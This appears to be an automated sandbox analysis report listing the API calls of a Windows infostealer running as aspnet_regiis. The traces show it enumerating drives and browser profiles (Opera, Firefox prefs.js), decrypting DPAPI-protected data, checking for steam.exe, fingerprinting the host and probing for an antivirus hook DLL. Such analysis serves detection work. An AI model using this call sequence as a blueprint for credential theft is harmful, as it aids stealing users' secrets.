                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 004026C6
                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 004026DA
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                      • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                                      • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                    • API String ID: 1475085387-1173974218
                                                                                                                                                                    • Opcode ID: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                                                                                    • Instruction ID: 84c523e9d2ff6d0b2cceb644b0baa1646f1dc192954122ea0c18f52f03966360
                                                                                                                                                                    • Opcode Fuzzy Hash: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                                                                                    • Instruction Fuzzy Hash: 6C32EC71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB86FC98F99
                                                                                                                                                                    APIs
                                                                                                                                                                    • wsprintfA.USER32 ref: 0041546A
                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00415481
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 0041550D
                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00415520
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00415534
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00415547
                                                                                                                                                                    • lstrcatA.KERNEL32(?,00436A88), ref: 00415559
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 0041556D
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                      • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                      • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                      • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                      • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                      • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                      • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 00415623
                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00415637
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                    • String ID: %s\%s
                                                                                                                                                                    • API String ID: 1150833511-4073750446
                                                                                                                                                                    • Opcode ID: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                                                                                                    • Instruction ID: 7b4a02d1ce16c29d0e311cc455c9dd4e2592c9f450b56a316f79c40a9e4a8b0e
                                                                                                                                                                    • Opcode Fuzzy Hash: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                                                                                                    • Instruction Fuzzy Hash: 71515FB190021D9BCF64DF60CC89AC9B7BDAB48305F1045E6E609E3250EB369B89CF65
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                    • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                    • API String ID: 2567437900-1710495004
                                                                                                                                                                    • Opcode ID: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                                                                                                    • Instruction ID: c4b769843fd96ba5a9993bec0907288b27e6520762e28c1f4f52d27b6ca0eed4
                                                                                                                                                                    • Opcode Fuzzy Hash: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                                                                                                    • Instruction Fuzzy Hash: 0E021D71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3191DBB86FC98F88
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
                                                                                                                                                                    • _memset.LIBCMT ref: 004151E5
                                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 004151EE
                                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 0041520E
                                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 00415229
                                                                                                                                                                      • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
                                                                                                                                                                      • Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                                                                                      • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
                                                                                                                                                                      • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
                                                                                                                                                                      • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                                                                                      • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                                                                                      • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
                                                                                                                                                                      • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                                                                                      • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
                                                                                                                                                                      • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
                                                                                                                                                                      • Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 004152C4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                                    • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                    • API String ID: 441469471-147700698
                                                                                                                                                                    • Opcode ID: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                                                                                    • Instruction ID: 002cc7b8fd832fc02ac953dee8a9373947a5751985c47ec76440b2e4c0201c02
                                                                                                                                                                    • Opcode Fuzzy Hash: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                                                                                    • Instruction Fuzzy Hash: 1B512DB190021CAFDF219FA1CC85BDA7BB9FB09304F1041AAEA48A7111E7355E89CF59
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E
                                                                                                                                                                      • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040D7E8
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0040D8B3
                                                                                                                                                                    • FindNextFileA.KERNELBASE(?,?), ref: 0040D956
                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 0040D96A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                    • String ID: prefs.js
                                                                                                                                                                    • API String ID: 893096357-3783873740
                                                                                                                                                                    • Opcode ID: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                                                                                    • Instruction ID: 927356911e44c3405f4de0d2be1bd74ddf2f7452577bbc1ac17ea627ea54bfb8
                                                                                                                                                                    • Opcode Fuzzy Hash: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                                                                                    • Instruction Fuzzy Hash: 38A11C71D001289BCF60FB65DD46BCD7375AF04318F4101EAA808B7292DB79AEC98F99
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 0040B780
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC8A
                                                                                                                                                                    • FindNextFileA.KERNELBASE(?,?), ref: 0040B8EB
                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 0040B8FF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3801961486-0
                                                                                                                                                                    • Opcode ID: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                                                                                    • Instruction ID: de252c0fab1b0e9a2d3383b13184952b75e93cbc882370f7403094166be9312a
                                                                                                                                                                    • Opcode Fuzzy Hash: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                                                                                    • Instruction Fuzzy Hash: 7E812C7290021C9BCF20FB75DD46ADD7779AB04308F4501A6EC48B3291EB789E998FD9
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 004124B2
                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 004124E4
                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00412521
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                    • String ID: steam.exe
                                                                                                                                                                    • API String ID: 1799959500-2826358650
                                                                                                                                                                    • Opcode ID: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                                                                                    • Instruction ID: 012bf4d8d1ff090a25d7979138f5f9e06e77e1c880a3c2a583d4811a910fbd8f
                                                                                                                                                                    • Opcode Fuzzy Hash: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                                                                                    • Instruction Fuzzy Hash: 17012170A01224DFDB74DB64DD44BDE77B9AF08311F8001E6E409E2290EB388F90CB15
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                    • String ID: /
                                                                                                                                                                    • API String ID: 507856799-4001269591
                                                                                                                                                                    • Opcode ID: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                                                                                                    • Instruction ID: d89f910ec230dae430ffd6d330d852df9ea80ceecc6bcaa0146556bb21002fe4
                                                                                                                                                                    • Opcode Fuzzy Hash: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                                                                                                    • Instruction Fuzzy Hash: 75314F71900328AFCB20EF65DD89BDEB3B9AB04304F5045EAF519A3152D7B86EC58F54
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1799959500-0
                                                                                                                                                                    • Opcode ID: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                                                                                                    • Instruction ID: d2a27fa508e6c3a354df25509a6f4190b9582d57abc1eee0c1e907853c614cd1
                                                                                                                                                                    • Opcode Fuzzy Hash: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                                                                                                    • Instruction Fuzzy Hash: 3B0162316002249BDB619B60DD44FEA76FD9B14301F8400E6E40DD2251EA798F949B25
                                                                                                                                                                    APIs
                                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                                                                                    • LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                    • String ID: DPAPI
                                                                                                                                                                    • API String ID: 2068576380-1690256801
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 907984538-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                                                                                    • wsprintfA.USER32 ref: 00410D7D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 362916592-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                                                                    • GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateNameProcessUser
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1296208442-0
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoSystemwsprintf
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2452939696-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcmpi

Control-flow Graph

[Figure: control-flow graph, entry node 29 (405482-405593); legend: Executed / Not Executed]
                                                                                                                                                                    APIs
